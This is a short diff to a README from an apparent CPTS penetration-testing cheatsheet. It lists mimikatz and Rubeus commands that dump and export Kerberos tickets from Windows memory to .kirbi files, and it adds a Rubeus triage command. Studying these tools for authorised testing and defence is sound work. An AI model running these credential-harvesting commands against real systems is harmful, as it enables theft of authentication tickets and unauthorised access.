haivan7/CPTS-cheatsheet/README.md

 # Harvesting Kerberos tickets from Windows by mimikatz ( it wil export ticket to file .kirbi )
 mimikatz.exe privilege::debug "sekurlsa::tickets /export" exit

+# View all tickets that the current session is accessible for.
+Rubeus.exe triage

 # Harvesting Kerberos tickets from Windows by Rubeus   ( it wil export ticket to file .kirbi )
 Rubeus.exe dump /nowrap